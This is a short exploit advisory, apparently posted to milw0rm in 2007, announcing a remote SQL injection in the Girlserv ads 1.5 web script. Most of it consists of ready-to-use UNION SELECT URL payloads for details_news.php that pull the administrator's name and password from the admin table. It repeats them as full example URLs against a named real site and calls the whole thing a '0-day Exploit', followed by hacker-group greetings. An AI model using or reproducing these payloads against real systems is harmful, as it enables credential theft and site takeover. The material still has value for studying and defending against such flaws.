Girlserv ads <= 1.5 Remote SQL Injection Vulnerability Found By : Cold z3ro , Cold-z3ro@hotmail.com Homepages : http://hackteach.org , http://h4ps.com Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip For Admin : /details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/* For password : /details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/* Example ; http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/* http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/* ================================================= 0-day Exploit :) ================================================= Greets : Hackteach members , Pal-hacker.com admins , xp10.com members , and All friend ============================================= Cold !F iT z3ro , No One Equal One ============================================= #Long life Palestine #http://hackteach.org # milw0rm.com [2007-07-03]